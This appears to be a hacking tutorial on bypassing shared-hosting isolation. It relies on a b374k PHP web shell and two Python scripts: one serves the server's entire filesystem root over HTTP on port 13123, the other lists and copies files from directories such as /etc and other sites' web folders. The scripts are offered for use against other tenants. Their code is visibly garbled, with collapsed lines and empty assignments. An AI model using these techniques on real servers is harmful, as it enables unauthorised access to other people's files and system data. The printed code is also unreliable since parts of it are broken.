Skip to main content

Server Bypass via Symlink - Jumping in server


As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • b374k.php shell
  • And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.

here we are in folder
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

#!/usr/bin/env python# (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example:" + str(port)) httpd.serve_forever()

Next u wil need to run the script by following command

open the site with port 13123

Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.

Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called and here it's the source

#!/usr/bin/env python
# (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer =
if copy_buffer:

if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')

target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)

sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
f = open(target, "rb")
byte =
while byte != "":
byte =
sys.stdout.write("Can't found file or folder : " + target)

testing the script

User the tool to view folders where not have any permission to read inside

python /var/www/index.php

View the files in no access folder .
python /var/www/index.php

copy/ save ur file
python /var/www/indro/ketek.jpg ketek.jpg

And yeah file it's here

Yeahh fucking access it's granted

Some thing u can do with those other scripts in perl

enjoy it :)